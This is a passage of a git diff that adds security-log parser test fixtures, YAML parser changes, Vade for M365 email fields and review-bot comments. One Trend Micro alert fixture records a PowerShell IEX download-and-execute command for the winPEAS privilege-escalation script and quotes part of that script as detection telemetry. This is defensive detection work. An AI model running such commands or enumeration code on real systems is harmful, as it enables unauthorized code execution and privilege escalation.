if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": 
\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", 
\"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", 
\"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 
'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n 
}\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], 
\"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:45:28Z", 
+ "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml 
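Review bot: With `raise_errors: false` a `http_request_url` that does not match the pattern presumably leaves the `message` output unset instead of failing the event, so any later stage that reads `message.url_scheme`, `message.url_domain` or `message.url_path` has to tolerate the field being absent; those stages, like the stage's own `- name:` line, are outside the hunk. A comment above the added line would record the intent, e.g. `# tolerate non-matching URLs: later stages must cope with an absent output field`. The same one-line addition is made in the Veeam, WatchGuard, Windows and WithSecure parser hunks below, and none of the fixtures visible in this commit feeds an input the pattern rejects, so one such test per parser would pin the new silent-failure behaviour.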
+++ b/VadeSecure/vade_secure_m365/_meta/fields.yml
@@ -58,6 +58,22 @@ vadesecure.attachments:
 short: vadesecure.to_header
 type: array

+vadesecure.auth_results_details.dkim:
+ description: The result of the DomainKeys Identified Mail (DKIM)
+ name: vadesecure.auth_results_details.dkim
+ type: keyword
+
+vadesecure.auth_results_details.dmarc:
+ description: Result of the Domand-based Message Authentication Reporting and Conformance
+ (DMARC)
+ name: vadesecure.auth_results_details.dmarc
+ type: keyword
+
+vadesecure.auth_results_details.spf:
+ description: The result of the Sender Policy Framework (SPF)
+ name: vadesecure.auth_results_details.spf
+ type: keyword
+
 vadesecure.campaign.actions:
 description: The actions carried out for the remediation campaign.
 name: vadesecure.campaign.actions
diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml
index d773e0e11..49acafa59 100644
--- a/VadeSecure/vade_secure_m365/_meta/manifest.yml
+++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml
@@ -1,8 +1,10 @@
 uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232
 name: Vade for M365
 slug: vade-m365
-description: Vade for M365 offers all protections from Vade to our Microsoft 365 Email service
+automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201
+automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff
+description: >-
+ Vade for M365 offers all protections from Vade to our Microsoft 365 Email service
 data_sources:
 Anti-virus: Vade performs behavioral-Based Anti-Malware
 Email gateway: Vade for M365 blocks attacks from the first email thanks to machine learning models that perform real-time behavioral analysis of the entire email, including any URLs and attachments.
-automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff
diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml
index 539de1df4..cbac9cd2d 100644
--- a/VadeSecure/vade_secure_m365/ingest/parser.yml
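Review bot: The description of the added `vadesecure.auth_results_details.dmarc` entry misspells the acronym's expansion: `Domand-based` should read `Domain-based`, i.e. `description: Result of the Domain-based Message Authentication Reporting and Conformance (DMARC)`. Continuing that value onto a second plain-scalar line parses, but the sibling `dkim` and `spf` descriptions are single lines, so keeping it on one line (or folding with `>-`) would keep the three entries uniform. Naming the value space in all three descriptions, such as the `none`, `fail` and `temperror` values that appear in the fixtures added in this commit, would tell analysts what to filter on.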
+++ b/VadeSecure/vade_secure_m365/ingest/parser.yml
@@ -56,6 +56,7 @@ stages:
 actions:
 - name: set
 set:
+ vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}"
 vadesecure.folder: "{{parse_json.message.folder}}"
 vadesecure.from_header: "{{parse_json.message.from_header}}"
 vadesecure.to_header: "{{parse_json.message.to_header}}"
@@ -131,3 +132,7 @@ stages:
 - set:
 source.ip: "{{parse_json.message.sender_ip}}"
 filter: "{{parse_json.message.sender_ip| is_ipaddress}}"
+
+ - set:
+ email.reply_to.address: "{{parse_json.message.reply_to_header}}"
+ filter: "{{parse_json.message.reply_to_header != ''}}"
diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json
new file mode 100644
index 000000000..7b2c0ae83
--- /dev/null
+++ b/VadeSecure/vade_secure_m365/tests/email_02.json
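Review bot: The new `email.reply_to.address` set is guarded only by `reply_to_header != ''`, which presumably does not cover the key being absent from the vendor payload, whereas the `source.ip` set just above it validates with `| is_ipaddress`; if `reply_to_header` can be missing and the engine exposes Jinja's `default` filter, `filter: "{{parse_json.message.reply_to_header | default('') != ''}}"` would avoid emitting an empty address. The two fixtures added in this commit only cover the present-and-set and present-but-empty cases. In the first hunk, the whole `auth_results_details` object is copied into `vadesecure.auth_results_details` while the fields file only declares `dkim`, `dmarc` and `spf`, so any additional key from the vendor would land undeclared; a comment on that line noting which sub-keys are expected would make the contract explicit.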
@@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": 
\"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], 
\"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + 
"filename": "image001.jpg",
+ "id": "12345678901234567890"
+ }
+ ],
+ "auth_results_details": {
+ "dkim": "fail",
+ "dmarc": "none",
+ "spf": "temperror"
+ },
+ "from_header": "John DOE ",
+ "last_report_date": "0001-01-01T00:00:00Z",
+ "overdict": "clean",
+ "status": "LEGIT",
+ "to_header": "Alan Smithee ",
+ "whitelist": "false"
+ }
+ }
+}
\ No newline at end of file
